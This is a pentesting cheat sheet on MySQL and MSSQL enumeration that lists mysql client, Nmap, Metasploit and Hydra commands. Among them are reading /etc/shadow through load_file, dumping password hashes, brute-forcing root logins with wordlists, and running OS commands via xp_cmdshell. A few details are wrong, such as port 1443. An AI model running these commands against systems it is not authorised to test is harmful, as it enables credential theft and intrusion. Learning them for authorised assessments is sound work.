🗄️MySQL & MSSQL Enumeration

SQL (Structured Query Language) is a programming language used to manage and manipulate databases. It enables tasks like inserting, updating, querying, and deleting data. SQL databases use port 1433 (Microsoft SQL Server), 3306 (MySQL), and 5432 (PostgreSQL) for communication, allowing applications to interact with and retrieve information from structured data repositories.

MySQL - Basic Enumeration

Mysql command-line tool

The "mysql" command-line tool is used to access and manage MySQL databases, connecting to a server with specified credentials and options.

  • Connecting to a MySQL Database Server: This command is used to connect to a MySQL database server hosted at the specified <target> IP address or hostname using the specified <user> username.

mysql -h <target> -u <user>

Common MySQL Command-Line Commands:

  • Connect to the Database: The ; symbol is used to terminate commands, but it is not a standalone command for connecting. To connect to a database, you typically use:

MySQL [(none)]> use <database>;

  • Count the Records in a Table: Counts the number of records in the authors table.

MySQL [books]> select count(*) from authors;

  • Retrieve All Records from a Table: Retrieves all records from the authors table.

MySQL [books]> select * from authors;

  • Attempt to Read a File: Attempts to read the contents of the /etc/shadow file, which is a potential security vulnerability if file read access is granted.

MySQL [(none)]> select load_file("/etc/shadow");

MySQL & MSSQL: Nmap Enumeration Scripts

  • Gather Basic Information: This command is used with Nmap to gather basic information about Microsoft SQL Server instances during network scanning.

nmap --script ms-sql-info <target>

  • Gather NTLM Authentication Information: This command is employed with Nmap to gather NTLM authentication information from Microsoft SQL Server instances running on port 1443.

nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1443 192.168.1.10

  • Perform Brute-Force Attacks: This command is used to perform brute-force attacks on Microsoft SQL Server instances using username and password lists located in the specified directory paths.

nmap --script ms-sql-brute --script-args userdb=<dir_path>,passdb=<dir_path> <target>

  • Detect Empty (Blank) Passwords: This command is used with Nmap to detect Microsoft SQL Server instances with empty (blank) passwords.

nmap --script ms-sql-empty-password <target>

  • Execute SQL Queries: This command is used with Nmap to execute a specific SQL query on a Microsoft SQL Server instance using provided credentials and save the output to output.txt.

nmap --script ms-sql-query --script-args mssql.username=<username>,mssql.password=<password>,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt <target>

  • Dump Password Hashes: This command is used with Nmap to attempt dumping password hashes from a Microsoft SQL Server instance using provided credentials.

nmap --script ms-sql-dump-hashes --script-args mssql.username=<username>,mssql.password=<password> <target>

  • Execute Commands via xp_cmdshell: This command is used with Nmap to execute the specified command (ifconfig in this case) using the xp_cmdshell extended stored procedure on a Microsoft SQL Server instance.

nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=pass,ms-sql-xp-cmdshell.cmd="ifconfig" 192.168.1.10

  • Detect Empty (Blank) Passwords: This command is used with Nmap to detect MySQL servers with empty (blank) passwords.

nmap --script mysql-empty-password <target>

  • Determine if MySQL Servers Provide Empty Password Information: This command is used with Nmap to determine if MySQL servers provide empty (blank) password information.

nmap --script mysql-empty-info <target>

  • Identify MySQL Users: This command is used with Nmap to identify MySQL users on the target server, attempting to authenticate using the username root and an empty password.

nmap --script mysql-users --script-args="mysqluser='root',mysqlpass=''" <target>

  • Enumerate MySQL Databases: This command is used with Nmap to enumerate MySQL databases on the target server, trying to authenticate using the username root and an empty password.

nmap --script mysql-databases --script-args="mysqluser='root',mysqlpass=''" <target>

  • Retrieve MySQL Server Variables: This command is used with Nmap to retrieve MySQL server variables from the target, attempting to authenticate with the username root and an empty password.

nmap --script mysql-variables --script-args="mysqluser='root',mysqlpass=''" <target>

  • Perform a Basic MySQL Security Audit: This command is employed with Nmap to perform a basic MySQL security audit on the target server.

nmap --script mysql-audit --script-args="mysqluser='root',mysqlpass=''" <target>

  • Dump MySQL Password Hashes: This command is used with Nmap to attempt dumping password hashes from a MySQL server using the username root and an empty password.

nmap --script mysql-dump-hashes --script-args="mysqluser='root',mysqlpass=''" <target>

  • Execute a Specific SQL Query: This command is used with Nmap to execute a specific SQL query on a MySQL server, using the query "select count(*) from books.authors;", and attempting authentication with the username root and an empty password.

nmap --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" <target>

  • Perform a MySQL Security Audit with a Specified Audit File: This command is used with Nmap to perform a MySQL security audit using a specified audit file.

nmap --script mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" <target>

MySQL & MSSQL: Metasploit Enumeration Scripts

  • Microsoft SQL Server Commands: In msfconsole, the command use auxiliary/scanner/mssql/mssql_login is used to perform login attempts on Microsoft SQL Server instances for credential testing during security assessments.

use auxiliary/scanner/mssql/mssql_login

  • Enumerate SQL Server Logins: In msfconsole, the command use auxiliary/admin/mssql/mssql_enum_sql_logins is used to enumerate SQL Server logins on a Microsoft SQL Server instance during security assessments.

use auxiliary/admin/mssql/mssql_enum_sql_logins

  • Execute Arbitrary SQL Commands: In msfconsole, the command use auxiliary/admin/mssql/mssql_exec is used to execute arbitrary SQL commands on a Microsoft SQL Server instance during security assessments.

use auxiliary/admin/mssql/mssql_exec

  • Enumerate Domain Accounts: In msfconsole, the command use auxiliary/admin/mssql/mssql_enum_domain_accounts is used to enumerate domain accounts on a Microsoft SQL Server instance during security assessments.

use auxiliary/admin/mssql/mssql_enum_domain_accounts

  • Scan for Writable Directories: In msfconsole, the command use auxiliary/scanner/mysql/mysql_writable_dirs is used to scan for MySQL databases with writable directories for security assessment.

use auxiliary/scanner/mysql/mysql_writable_dirs

  • Retrieve MySQL Password Hashes: In msfconsole, the command use auxiliary/scanner/mysql/mysql_hashdump is used to retrieve password hashes from a MySQL database for security assessment.

use auxiliary/scanner/mysql/mysql_hashdump

MySQL: Dictionary Attack

  • In msfconsole, the command use auxiliary/scanner/mysql/mysql_login is used to perform login attempts on MySQL servers for credential testing during security assessments.

use auxiliary/scanner/mysql/mysql_login

  • This command uses Hydra to perform a brute-force attack on a MySQL server located at the specified target. It attempts to guess the password for the "root" username using the "unix_passwords.txt" wordlist.

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <target> mysql

Hacker's Mantra:Garbage can provide important details for hackers: names, telephone numbers, a company’s internal jargon. - Kevin Mitnick

PreviousHTTP EnumerationNextVulnerability Assessment

Last updated